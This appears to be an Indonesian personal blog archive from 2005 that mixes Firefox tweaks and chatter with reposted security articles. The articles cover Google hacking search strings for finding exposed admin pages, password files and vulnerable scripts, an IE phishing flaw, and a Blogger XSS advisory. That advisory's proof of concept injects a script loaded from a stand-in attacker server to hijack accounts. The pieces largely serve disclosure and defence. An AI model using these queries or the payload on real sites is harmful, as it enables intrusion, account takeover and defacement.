.:: ZONE - D ::.

Utak Atik Browser Firefox

2005-03-04T08:50:00.000+08:00

Posting kali ini, idenya dari si Adi, yang dengan rasa terima kasih, saya diberitahu buat nge-hack Firefox...
Setelah saya gole'i neng mas bos google, akhire ketemu juga.
Berikut hasil tulisan temen kita yang bernama hevnsnt trus saya coba meng-Indonesia-kannya, mohon maklum kalo rada ngawur...

Ok, Firefox adalah browser favorit ku, jika kamu ngga nggunainnya ( misal hanya nggunain... Gasp, I.E) kamu perlu perubahan. Baiklah Aku memutuskan untuk menulis suatu artikel tentang bagaimana caranya "nge-Hack" Firefox agar menjadi lebih baik. "nge-Tweak" disana-sini, kita buat Firefox menjadi lebih cepat, sehingga memungkinkan untuk "advanced tab option" , juga membuatnya agar versi baru kompatibel dengan older extentions, bisa secara langsung dengan "Flash Disk", dan lain-lain.

Pertama², Mari kita ubah pada bagian "option" yang tersembunyi agar membuatnya lebih cepat
1. Buka Firefox 1.0 dan pada "address bar" ketikan: "about:config" , lalu di-enter atau klik tombol "GO".
2. Ketikan "browser.tabs.showSingleWindowModePrefs" pada "filter bar" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian preference name ada nongol dengan value "false", nah lalu "di-klik 2 kali "browser.tabs.showSingleWindowModePrefs", dan value akan berubah jadi "true"
3. Ketikan "network.http.pipelining" pada "filter bar" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian preference name ada nongol dengan value "false", nah lalu "di-klik 2 kali "network.http.pipelining", dan value akan berubah jadi "true"
4. Ketikan "network.http.pipelining.maxrequests" pada "filter bar" (gak usah di-enter, ntar keluar sendiri...) ntar dibagian preference name ada nongol dengan value "4", nah lalu "di-klik 2 kali " network.http.pipelining.maxrequests", dan ubah value menjadi "100"

Apa yang berubah ??
1. Memungkinkan "advanced tab option" pada "Tools/Options page" browser anda.
2. Memungkinkan "option" # 3.
3. Membuat Firefox menggunakan 8 "thread" di tiap page. Pokoknya Firefox anda akan lebih cepat dari sebelumnya.

Ke dua, mari kita buat menjadi lebih baik lagi..
Kunjungi "Theme Page" Mozilla Firefox dan pilih salah satu "theme".
Aku make Noia eXtreme skin.

Sekarang biarkan perbuatan "tweak" kita tadi bekerja...
Salah satu yang paling menarik dari Firefox adalah kemampuannya dalam penggunaan extentions. Pada saat penulisan artikel ini, ada 226 extentions yang dapat kita gunakan untuk membuatnya lebih baik.. Aku hanya akan menyinggung beberapa di antaranya.
Adblock: Memblok iklan
Bookmarks Synchronizer: nge-save bookmark anda ke file XML, dan sync dengan suatu FTP server.
Digger: Navigasi ke parent direktori, tombol ke ftp padanan lokasi, hingga ke subdomain, dll. Sangat membantu saat "Scouting" suatu situs.
Download Sort;Jenis: Otomatis menaro file download-an ke folder atau direktori yang kita inginkan.
Gmail Notifier:: Memberitahukan pada kamu, jika kamu mendapatkan email baru (asal kamu punya email di Gmail)
Google Pagerank Status: Memperlihatkan Google Pagerank dari halaman yang sedang kamu kunjungi.
refspoof: "Spoof" your referrer (saya gak tau artinya kekekek).
Spiderzilla: Untuk ngedownload satu halaman penuh di direktori lokal.
Super DragAndGo: Drag suatu link ke halaman kosong, maka akan terbuka satu "Tab" baru.
SwitchProxy:: Mengatur beberapa proxy.
User Agent Switcher: nge-switch user agent browser kamu.
x: Adalah tombol Toolbar "Paranoia", tinggal di-klik dan akan menghapus segala "History", "Form Info", password yang ter-save, history downloadan, cookies dan cache.

Beritahu Firefox apa yang kita inginkan atau apa yang tidak kita inginkan...
Bosan dengan iklan Goggle ? Mari kita utak-atik Firefox, agar tidak menampilkan iklan-iklan tersebut..(yaaa termasuk dari Gmail). Hati² dengan memindahkan iklan ini, kita udah melanggar aturan email Gmail.
Caranya adalah dengan mengubah file CSS yang pada Firefox bernama UserContent.CSS.
Kita lakukan edit pada file CSS tersebut, saya sarankan kamu nge-download dulu Plugin "ChomEdit" untuk mempermudah pekerjaan ini. Install plugin tersebut lalu browser Firefox di restart kembali.
Pada browser Firefox kliklah pada tab "Tools/Edit User Files, maka jendela baru akan terbuka dengan 5 tab di bagian atasnya. Klik pada tab yang bertuliskan "UserContent.CSS". Lalu klik pada link dibawahnya dan copy-kan semuanya, lalu paste-kan ke file Usercontent.CSS lalu di Save....udah deh kelarrrr.
Ini kode untuk CSS-nya Code
Taraaa iklan Gogglenya ilang .......
Nah... sekian postingan daku....

Firefox browser teraman ???

2005-03-02T08:07:00.000+08:00

Sekarang gw baru tau, kalo browser pesaing terberat I.E adalah browser keluaran Mozzila yakni : Firefox.
Kata para netter sih, browser ini paling aman dan kayanya I.E bakalan tergusurrrrr....
Menurut pengalaman sih, kalo suatu software yang laku keras biasanya...ujung²nya, gak gratis.., misalnya : kaya httrack yang udah gak gratisan lagi di httrack.com . Padahal program itu bagus banget buat ngambil informasi satu website penuh.
Makanya mumpung masih gratis, cepetan download browser ini : Firefox
mumpung gratis, dan mungkin bagi netter yang udah mulai bosan make I.E,.

Leiotku...

2005-02-28T12:35:00.000+08:00

Liat-liat blog orang...., ada yg leiotnya bagus, isinya bagus, gw jadi bingung sendiri, sebenernya bagus itu harus milih salah satunya gak yah,
waktu bikin blog ini, sempet gak pengen leiot yg bagus² amat, *bathin* gw sih bilang yg penting isinya......, trus sekarang *bathin* gw bilang "mending leiotnya juga bagus*..... eh malah isi blog gw sekarang gak terlalu bagus juga kakakakakkk....
Gara-garanya pengen punya leiot blog bagus, pas ngeliat situs CSSVAULT sama CSSBEAUTY *ckckckck*
Mungkin suatu hari, leiot ini akan gw ubah juga kali...
Yang jelas lagi pengen punya blog yg 3 column... ntah kenapa..
Hmmm... tapi biasanya, kalo blog bagus itu suka make gambar² yg banyak, dan itu bikin lama baru tampil, dilema ini bisa dipecahin gak yah ???

Phishing hole found in IE and OE

2005-02-18T13:16:00.000+08:00

Another major vulnerability has been found in Microsoft's Internet Explorer and OutlookExpress. The flaw is in the way that these applications can be manipulatedin simple HTML code to display an URL other than the one specified in a link, tobe displayed in the status bar.
The status bar is the first place users look, or at least should look when followingany link in an email or on a website to ensure that the link is taking them towhere it says it is. HTML that utilizes this vulnerability can change what isdisplayed in the status bar of these applications, thus leading to a possible majorphishing hole that can be used in very serious ways.
Proof of concept code has been released and a description of how the flaw is utilizedhas been published. Below is an example of the flaw, and if you are using InternetExplorer to view this page, then in the status bar, you will see eBay.com,however if you are using Firefox, then you will see spreadfirefox.com. If youclick on the link in Internet Explorer you will be directed to spreadfirefox.com,however in Firefox, you will go to eBay.com.
Here is the code:

An example and this article can be seen at: http://habaneronetworks.com/viewArticle.php?ID=140 & http://www.securityfocus.com/archive/1/390784 If you did use Internet Explorer to open the link, then maybe you should read aboutFirefox here, and consider switching. Mozilla also has a beautiful product toreplace Outlook Express too.

Valentine's Day: Everyone's having sex today but YOU

2005-02-15T12:37:00.000+08:00

It's Valentine's Day. Half of the country will be f--king like wild billy-goats. The other half will just be f--king bitter. The good folks at Durex have something for both camps. The former can indulge in the contraceptive concern's wide range of STD- and pregnancy-busting prophylactics. And for the latter, nothing less than an international-sized reminder of how much play they're missing out on. Durex, a subsidiary of London-based SSL International, recently released their annual survey of sexual behavior around the world. The "Global Sex Survey," now in its eighth year, polled more than 350,000 people from 41 countries, and is billed as the largest such study around. Among the 16 questions, the following six stood out to me (I only listed results for first place, Canada, global average, India, U.K., U.S. and last place)...

waw...ckckckc

Wanna be hacker or Wanna be invisible ?

2005-02-14T10:21:00.000+08:00

Gak nyangka, ternyata ada yg mo mampir ke situs gw ini...
oh iya buat temen² yg pengen belajar nge-hack, bisa buka situs http://hackthissite.org , tapi kudu register dulu, asik juga buat iseng-iseng, kalo pengen cepet naik level bisa buka tutorialnya di http://johnny.ihackstuff.com cari bagian download dan kudu register juga, tapi (lagi) perlu di modif sedikit soalnya server game itu dah pindah.

Hmm..., ada lagi yang baru saya baca, soal proxy, ternyata selain kita bisa ngerubahnya di browser, kita bisa juga lewat web yah ... (kikikikik...ternyata gw masih gatek total..), temen² yg pengen surfing "rahasia" bisa lewat link yg disediakan di site http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm ini, atau langsung ke http://anonymouse.ws/ , dengan lewat site itu, kita bisa gak ketahuan abis buka situs yang kita ingin gak diketahui oleh orang yang pengen liat history kita.

Hmm maaf, bagi yang sudah tau, mungkin info ini juga basi, tapi mungkin berguna bagi yang belum mengetahuinya. (hehehehe...)

Kegiatan Hari Ini

2005-02-05T13:24:00.000+08:00

Seperti biasa, gw tetap gak punya banyak pekerjaan dikantor, akhirnya hobi browsing trus tersalurkan (xixixi...), cuman sempet bingung, saking banyaknya web site yg dibuka, gak tau lagi pengen baca apa lagi..... oh iya sempet bego juga, karena baru tadi gw ngarti apa itu RSS, (wakakakaka....), gw nyarinya: [ .:: klik disini ::. ]
ra popo toh daripada gak tau sama sekali..... :p
trus soal web site [ http://binaraga.info ] , gw heran hari gini, kok untuk informasi kesehatan kok, kudu bayar toh.., hmmmm *empet*, tapi sebelum site itu mereka jadiin kaya gitu, dulu dah pernah gw download satu websitenya (xixixix...)..... {ngedownloadnya make httrack bisa diambil di [ http://www.httrack.com ]}, isinya bagus banget, kebetulan gw lagi giat²nya ngebentuk body :)
Jadi yg gw browse hari ini : [ http://zone-h.org ], [ http://www.jasakom.com/Artikel.asp?ID=575 ] hmmm udah... sempet mampir lama di [ http://angkringan.or.id ]
........... have a nice weekend..?!?!

Tips Bikin Email Di Gmail

2005-02-02T14:38:00.000+08:00

Ada yg pengen punya email di gmail.com, tapi belum bisa ngedaftar....mungkin ini ada sedikit solusi, tapi maaf kalo tulisan ini rada basi..:), gw cuman berbagi buat yg belum tau aja :P.kalo gak salah sih, gmail masih menutup registernya, kecuali di invite..nah soal invite gmail ada solusinya dari mas johnny long, dan dimodif dikit :)

.:: klik ajah ::.

Setelah kebuka semuanya : Liat tanggal dan jam posting invitenya, ambil yang terbaru biar gak expired..... :)

Google Hacking Mini-Guide #2

2005-02-02T10:13:00.000+08:00

By Johnny Long.
Google Automated ScanningGoogle frowns on automation: "You may not send automated queries of any sort to Google's system without express permission in advance from Google. Note that 'sending automated queries' includes, among other things:- using any software which sends queries to Google to determine how a web site or web page 'ranks' on Google for various queries;- 'meta-searching' Google; and- performing 'offline' searches on Google."Any user running an automated Google querying tool (with the exception of tools created with Google's extremely limited API) must obtain express permission in advance to do so. It's unknown what the consequences of ignoring these terms of service are, but it seems best to stay on Google's good side.GooscanGooscan is a UNIX (Linux/BSD/Mac OS X) tool that automates queries against Google search appliances (which are not governed by the same automation restrictions as their web-based brethren). For the security professional, gooscan serves as a front end for an external server assessment and aids in the information-gathering phase of a vulnerability assessment. For the web server administrator, gooscan helps discover what the web community may already know about a site thanks to Google's search appliance.For more information about this tool, including the ethical implications of its use, see http://johnny.ihackstuff.com.GoogledorksThe term "googledork" was coined by the author and originally meant "An inept or foolish person as revealed by Google." After a great deal of media attention, the term came to describe those who "troll the Internet for confidential goods." Either description is fine, really. What matters is that the term googledork conveys the concept that sensitive stuff is on the web, and Google can help you find it. The official googledorks page lists many different examples of unbelievable things that have been dug up through Google by the maintainer of the page, Johnny Long. Each listing shows the Google search required to find the information, along with a description of why the data found on each page is so interesting.GooPotThe concept of a honeypot is very straightforward. According to http://www.techtarget.com, "A honey pot is a computer system on the Internet that is expressly set up to attract and 'trap' people who attempt to penetrate other people's computer systems."To learn how new attacks might be conducted, the maintainers of a honeypot system monitor, dissect, and catalog each attack, focusing on those attacks that seem unique.An extension of the classic honeypot system, a web-based honeypot or "page pot" (click here to see what a page pot may look like) is designed to attract those employing the techniques outlined in this article. The concept is fairly straightforward. Consider a simple googledork entry like this:inurl:admin inurl:userlistThis entry could easily be replicated with a web-based honeypot by creating an index.html page that referenced another index.html file in an /admin/userlist directory. If a web search engine such as Google was instructed to crawl the top-level index.html page, it would eventually find the link pointing to /admin/userlist/index.html. This link would satisfy the Google query of inurl:admin inurl:userlist, eventually attracting a curious Google hacker.The referrer variable can be inspected to figure out how a web surfer found a web page through Google. This bit of information is critical to the maintainer of a page pot system, because it outlines the exact method the Google searcher used to locate the page pot system. The information aids in protecting other web sites from similar queries.GooPot, the Google honeypot system, uses enticements based on the many techniques outlined in the googledorks collection and this document. In addition, the GooPot more closely resembles the juicy targets that Google hackers typically go after. Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover new search types and to publicize them in the form of googledorks listings, creating a self-sustaining cycle for learning about and protecting from search engine attacks.

Google Hacking Mini-Guide

2005-02-02T09:49:00.000+08:00

( http://www.peachpit.com/articles/article.asp?p=170880 )
By Johnny Long.
Using search engines such as Google, "search engine hackers" can easily find exploitable targets and sensitive data. This article outlines some of the techniques used by hackers and discusses how to prevent your site from becoming a victim of this form of information leakage.Other Articles By Johnny Long.
The Google search engine found at http://www.google.com/ offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google hacking." The intent of this article is to educate web administrators and the security community in the hopes of eventually stopping this form of information leakage. This document is an excerpt of the full Google Hacker's Guide published by Johnny Long, and located at http://johnny.ihackstuff.com/.
Basic Search TechniquesSince the Google web interface is so easy to use, I won't describe the basic functionality of the http://www.google.com/ web page. Instead, I'll focus on the various operators available:
Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.
To search for a phrase, supply the phrase surrounded by double quotes (" ").
A period (.) serves as a single-character wildcard.
An asterisk (*) represents any word—not the completion of a word, as is traditionally used.
Google advanced operators help refine searches. Advanced operators use a syntax such as the following:
operator:search_termNotice that there's no space between the operator, the colon, and the search term.
The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.
The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.
The link: operator instructs Google to search within hyperlinks for a search term.
The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.
The intitle: operator instructs Google to search for a term within the title of a document.
The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.
Google Hacking Mini-GuideBy Johnny Long.Date: May 7, 2004.Google Hacking TechniquesBy using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking.
Site MappingTo find every web page Google has crawled for a specific site, use the site: operator. Consider the following query:
site:http://www.microsoft.com microsoftThis query searches for the word microsoft, restricting the search to the http://www.microsoft.com/ web site. How many pages on the Microsoft web server contain the word microsoft? According to Google, all of them! Google searches not only the content of a page, but the title and URL as well. The word microsoft appears in the URL of every page on http://www.microsoft.com/. With a single query, an attacker gains a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to the IP address of the Microsoft web server, Google will cache that page as belonging to the IP address, not the http://www.microsoft.com/ web server. In this special case, an attacker would simply alter the query, replacing the word microsoft with the IP address(es) of the Microsoft web server.
Finding Directory ListingsDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.
Locating directory listings with Google is fairly straightforward. Figure 1 shows that most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be intitle:index.of, which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it's obvious that not only are these web pages intentional, they're also not the directory listings we're looking for. Several alternate queries provide more accurate results:
intitle:index.of "parent directory"intitle:index.of name sizeThese queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files of directories located in directory listings.
Versioning: Obtaining the Web Server Software/VersionThe exact version of the web server software running on a server is one piece of information an attacker needs before launching a successful attack against that web server. If an attacker connects directly to that web server, the HTTP (web) headers from that server can provide this essential information. It's possible, however, to retrieve similar information from Google's cache without ever connecting to the target server under investigation. One method involves using the information provided in a directory listing.
This example was gathered using the following query:
intitle:index.of server.atThis query focuses on the term index of in the title and server at appearing at the bottom of the directory listing. This type of query can also be pointed at a particular web server:
intitle:index.of server.at site:aol.comThe result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com both run Apache web servers.
It's also possible to determine the version of a web server based on default pages installed on that server. When a web server is installed, it generally will ship with a set of default web pages, like the Apache 1.2.6.
These pages can make it easy for a site administrator to get a web server running. By providing a simple page to test, the administrator can simply connect to his own web server with a browser to validate that the web server was installed correctly. Some operating systems even come with web server software already installed. In this case, an Internet user may not even realize that a web server is running on his machine. This type of casual behavior on the part of an Internet user will lead an attacker to rightly assume that the web server is not well maintained, and by extension is insecure. By further extension, the attacker can assume that the entire operating system of the server may be vulnerable by virtue of poor maintenance.
The following table provides a brief rundown of some queries that can locate various default pages.
Apache Server Version Query Apache 1.3.0–1.3.9 Intitle:Test.Page.for.Apache It.worked! this.web.site! Apache 1.3.11–1.3.26 Intitle:Test.Page.for.Apache seeing.this.instead Apache 2.0 Intitle:Simple.page.for.Apache Apache.Hook.Functions Apache SSL/TLS Intitle:test.page "Hey, it worked !" "SSL/TLS-aware" Many IIS servers intitle:welcome.to intitle:internet IIS Unknown IIS server intitle:"Under construction" "does not currently have" IIS 4.0 intitle:welcome.to.IIS.4.0 IIS 4.0 allintitle:Welcome to Windows NT 4.0 Option Pack IIS 4.0 allintitle:Welcome to Internet Information Server IIS 5.0 allintitle:Welcome to Windows 2000 Internet Services IIS 6.0 allintitle:Welcome to Windows XP Server Internet Services Many Netscape servers allintitle:Netscape Enterprise Server Home Page Unknown Netscape server allintitle:Netscape FastTrack Server Home Page
Using Google as a CGI ScannerTo accomplish its task, a CGI scanner must know what exactly to search for on a web server. Such scanners often utilize a data file filled with vulnerable files and directories like the one shown below:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll/cgi-bin/finger.cgi
Combining a list like this one with a carefully crafted Google search, Google can be used as a CGI scanner. Each line can be broken down and used in either an index.of or inurl search to find vulnerable targets. For example, a Google search for this:
allinurl:/random_banner/index.cgi
A hacker can take sites returned from this Google search, apply a bit of hacker "magic," and eventually get the broken random_banner program to cough up any file on that web server, including the password file.
Note that actual exploitation of a found vulnerability crosses the ethical line, and is not considered mere web searching.
Of the many Google hacking techniques we've looked at, this technique is one of the best candidates for automation, because the CGI scanner vulnerability files can be very large. The gooscan tool, written by j0hnny, performs this and many other functions. Gooscan and automation are discussed below.

Advanced Google Hacking

2005-02-02T09:43:00.000+08:00

I am in no way, shape, or form responsible for what you do with this information, this information is soley for educational purposes only.
Introduction
Well, you look at the title and I’m sure your all like “Not another google hacking tutorial…”. You might all think that google hacking is pretty much dead, admins have gotten smart. Well, the fact of the matter is, Google hacking is very far from dead, and a lot of admins are super far from being smart. The new virus that uses google’s searching power to find vulnerable sites just proves this point.
Now I have realized that there is a good tutorial on Google Hacking on AO already, and if you have not seen it you can find it here:
http://www.antionline.com/showthrea...did=257512&
This tutorial is different then that one and many others though, I am not simply going to show you what google can be used for, that has already been covered a ton of times. I am not going to simply show you “Index of” +htpasswd either, that to has been shown tons of times. I’m not going to teach you basic google operators and commands. Those have already been covered numerous times on AO and on google itself. They can be found here:
http://www.google.com/help/refinesearch.html
and here:
http://www.google.com/help/operators.html
So What The Hell Is This Tutorial About?
In this tutorial I am going to cover an advanced side to google hacking… If that makes sense… I see a lot of google tutorials telling you to go for the “Index of” +htpasswd and other password files. Most of these are shadowed anyway. Well, I’m going to base this tutorial on combinations. That’s right, combinations.
Combinations
You can’t Google Hack like you used to these days. A couple years ago all you had to do was search for inurl:admin.asp and you would have gotten hundreds of sites that were vulnerable. But these days that just gives you a bunch of crap, like companies trying to sell you their administrator software and such… Now you have to think of a combination of search commands and keywords to craft together to get what you want.
Now lets think about this for a minute… What exactly do we want? Admin login pages? Nah… Password lists? Maybe but… nah… Ah! I know… Lets try for administration pages! You know, the pages that allow the administrator to edit, delete, and configure things on their website?First things first, we need a base keyword, how about :
inurl:edit
Not much luck. Lets try adding something to it, but what? We obviously want something that will edit a site. How about we add +intitle:admin to the search?
inurl:edit +intitle:admin
Hmm... Doesn't look good. Looks like just a bunch of manuals and instructions. You might find something there but doubtful, there's just to much junk there. Looks like we need to add in a couple of things. Lets look for a specific file extention. We do this with the filetype command. How about we add the command filetype:asp.
inurl:edit +intitle:admin +filetype:asp
Now what we are doing is searching for only files that are asp's and have "edit" in the url and "admin" in the title. We enter this in google and we do get some administration areas, but there is still alot of demos and manuals and other junk. We also get alot of Admin login's, which aren't bad, but we want to bypass the login screen. How do we do that? Well lets add a -login -password to the search:
inurl:edit +intitle:admin +filetype:asp -login -password
BINGO! This search gives you a bunch of sites that you can get admin access to. We are happy with those results, but you should try to spice things up a bit. Like adding quotes and *'s to some things:
inurl:"*edit*" +intitle:"*admin*" +filetype:asp -login -password
This gives you some other intersting things as well. I think everyone knows what the quotes do, but I don't think alot of people know what the *'s do. Well, when they are added that means as long as "edit" is within ANYTHING google will show it. Like for instance:
inurl:"*edit*"
Might bring up a site with the url as /frontpage_edit .asp. Get the point? This could be used to find a certain software your trying to exploit. For example:
intext:"Powered by*"
The possibilities are endless!
Conclusion
Well, thats that. I wrote this tutorial to kind of be an extension of the one written before here on AO and to once again show the power of google and at the same time show that google hacking is not dead. There is so much more to explain, so many other ways to do such things and even more! Go and explore on your own using different combinations. Look at all the poorly configured sites. But don't exploit them! Just because you can copy and paste that search string and then find a vulnerable site and deface them or steal information does not make you some super l33t h4ck3r d00d. I almost didn't write this tutorial because I was afraid it would to easy for a dishonest person on this site to mess things up. We don't need any more skiddies defacing sites and yappin their gums off about their political views (dr. toker will agree ). If you want to be a true white hat contact the admin and tell him of his problem.
BTW, if you guys were interested, that worm that used google to spread did a real number! Google this:
intitle:"This site is defaced!!!" intext:"NeverEverNoSanity WebWorm generation"

Google as a Hacking Tool

2005-02-02T09:33:00.000+08:00

This tutorial is an introduction to the security risks associated with common internet search engines. In the past few years, Google has come to be the most popular search engine in the world, so much so that many consider it the only one worth using. For this reason this tutorial will focus on Google, however it can be safely assumed that most of what is said here applies to other similar engines as well.
WEB VULNERABILITIES
A system is vulnerable when an attacker is able to make it do something it's not supposed to. There are generally two types of vulnerabilities to be found on the web: software vulnerabilities and user misconfigurations.
Although there are some sophisticated attackers who target a specific system and try to discover vulnerabilities which will allow them access, the vast majority of attackers start out with a specific software vulnerability or common user misconfiguration which they already know how to exploit, and simply try to find - or scan for - systems which have this vulnerability. Google is of limited use to the first attacker, but invaluable to the second, as will be explained in the next section.
SCANNERS
When an attacker knows the sort of vulnerability they want to exploit but have no specific target, they employ a scanner. This is a program which automates the process of examining a massive quantity of systems for a security flaw. The earliest computer related scanner, for example, was a wardialer; a program which would dial long lists of phone numbers and record which ones responded with a modem handshake.
Today there are scanners which automatically query IP addresses to see what ports they have open, determine what operating system they're probably running, some even determine the geographic location of the system. One of the most popular IP scanners is NMap ( http://www.insecure.org ). When using NMap, one specifies a range of hosts and the specific services on each one to scan for. The program will then return a list of the available (and presumably vulnerable) systems.
GOOGLE AS A SCANNER
With a little creativity, Google can be made to operate in a similar way as NMap, though they use different protocols. As an example, let's pretend that we know a great new exploit that will allow us to steal credit card information from any online store that uses the SHOP.PL scripts. We know that www.secure.com uses SHOP.PL, but when we try our exploit it turns out that they already patched the vulnerability. As dedicated malicious hackers, though, we don't give up. We turn to Google and enter the following search string:
inurl:shop.pl
Feel free to try this - it's not illegal and shouldn't get you in to trouble. Note that the above search employs advanced operators, which are described here: ( http://www.google.com/help/operators.html ). What is produced is a list of all sites which have "shop.pl" somewhere in their URL, essentially a list of potentially vulnerable targets. Just as with NMap, all that's left to do is try our exploit against each site on the list.
There are countless variations on this scheme, including some rather clever ways to find particular versions of server programs. For example, if one was to enter:
"seeing this instead" intitle:"test page for apache"
It would return a list of sites using Apache 1.3.11 - 1.3.26, because those specific phrases are used on the default page for those versions. Once again, if an attacker had an exploit for Apache 1.3.11 - 1.3.26, it would take very little effort to compromise a large number of systems.
GOOGLE AS AN EXPLOITER
It seems ridiculous, but sometimes administrators misconfigure their sites so badly, it's not even neccessary to use a "third party" exploit in order to gain access to a system. Google indexes the web very aggressively, and unless a file is put behind in a password or otherwise access-restricted area of your website, there is a good chance that it will be searchable in Google. This includes password files, credit reports, medical records, etc.
In cases where the files are not adequately protected from Google, the search engine has basically already performed the exploit for the attacker. If, for example, a script kiddie wanted to deface a random web site, he or she would simply search for:
intitle:"Index of" htpasswd
Which would return a list of all poor users who allowed Google to index their .htpasswd file, probably containing the administrative username and password for their web page. All the attacker would need to do is open the file, crack the password, and deface away.
GOOGLE AS A PROXY
A proxy is an intermediary system which an attacker can use to disguise his or her identity. For example, if I was to gain remote access to Bill Gates' computer and cause it to run attacks on cia.gov, it would appear to the Feds that Bill Gates was hacking them. His computer would be acting as a proxy. Google can be used in a similar way, as is explained here.
Even if Google didn't provide such an easy way to locate vulnerabilities, there are other tools which can do that particular job. A program called AccessDiver ( http://www.accessdiver.com/ ) allows the user to specify a domain name, and it tries to access URLs which commonly lead to sensitive data or system access. This tool was, however, intended for use by administrators on their own networks. If anyone tried to use this tool against cia.gov, the system would deny them access, log their IP, and send them to jail for attempted computer trespass.
When using Google, there is very little danger of detection, because the attackers computer doesn't have to access every site itself and ask suspicious questions like "Do you have a page containing .htpasswd?" The search engine has already gathered this information and will give it freely without a peep to the vulnerable site. Things get even more interesting when you consider the Google cache function. If you have never used this feature, try this:
Do a Google search for "USA Today". Click on the first result and read a few of the headlines. Now click back to return to your search. This time, click the "Cached" link to the right of the URL of the page you just visited. Notice anything weird? You're probably looking at the headlines from yesterday or the day before. Why, you ask? It's because whenever Google indexes a page, it saves a copy of the entire thing to its server. You are accessing the most recent copy Google made of www.usatoday.com.
This can be used for a lot more than reading old newspapers. Our attacker can now use Google to scan for sensitive files without alerting potential targets, and even when a target is found the attacker can access it's files from the Google cache without ever making contact with the target's server. The only server with any logs of the attack would be Google's, and it's unlikely they will realize an attack has taken place.
An even more elaborate trick involves crafting a special URL that would not normally be indexed by Google, perhaps one involving a buffer overflow or SQL injection (common web exploits). This URL is then submitted to Google as a new web page at ( http://www.google.com/addurl.html ). Google automatically accesses it, stores the resulting data in it's searchable cache, and the rest is history.
SECURING AGAINST GOOGLE EXPLOITS
This probably doesn't even have to be mentioned at this point, but make sure you are comfortable with sharing everything in your public web folder with the whole world, because Google will share it, whether you like it or not. Also, in order to prevent attackers from easily figuring out what server software you are running, change the default error messages and other identifiers. Often, when a "404 Not Found" error is detected, servers will return a page like this:
quote: Not FoundThe requested URL /cgi-bin/xxxxxx was not found on this server.
Apache/1.3.27 Server at www.countrybookshop.co.uk Port 80
The only information that the legimitate user really needs is on the top line, and restricting the other information will prevent your page from turning up in an attacker's search for a specific flavour of server.
The Google cache issue raises another interesting security concern: just because you take a document off your site doesn't mean it's inaccessible. Google periodically purges it's cache, but until then your sensitive files are still being happily offered to the public. If you realize that the search engine has cached files which you want to be unavailable, go to ( http://www.google.com/remove.html ) and follow the instructions to remove your page, or parts of your page, from their database.
There is not really anything that an administrator can do to prevent the use of Google as a proxy, so the best thing to do is ensure that your system is not vulnerable to any HTTP attacks that could be conducted through Google. A good HTTP vulnerability scanning tool is N-Stealth ( http://www.nstalker.com/nstealth/ ). Run this against your network, and it will hopefully point out any holes that you need to patch up.
OTHER RESOURCES
There are many, many variations on the Google hacking techniques described here. An excellent place to find out more about these exploits is ( http://johnny.ihackstuff.com/ ). ( http://www.oxygen-inc.com/google.html ) Also contains a pretty good tutorial specifically focusing on how to find sensitive information using Google.
Hope this information is useful!

BLOGGER XSS VULNERABILITY

2005-01-31T13:18:00.000+08:00

XSS DETAILS;
There is no HTML filter when rendering user profiles. So anyone can inject a script into a profile's "First Name" "Last Name" etc.If you inject a code into "First Name" this will be print and run in users's first page [www.blogger.com], so an attacker can easily gain victim's account.
Proof Of Concept;
Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to victim "First Name" Now you can execute anything in remote. After login as your victim; I. You can change password (without old password) II. You can change e-mail address without any confirmation III. You can own the victim blogs *Replace ][,<> *Script injection is limited to 50 characters (but it's pretty enough to add js script)
HISTORY;-
Discovered : 2/22/2004Vendor Informed : 2/25/2004Published : 3/26/2004
VENDOR STATUS;
Contact established with Google but there is no answer.Ferruh MavitunaWeb Application Security Specialisthttp://ferruh.mavituna.comferruh[at]mavituna.com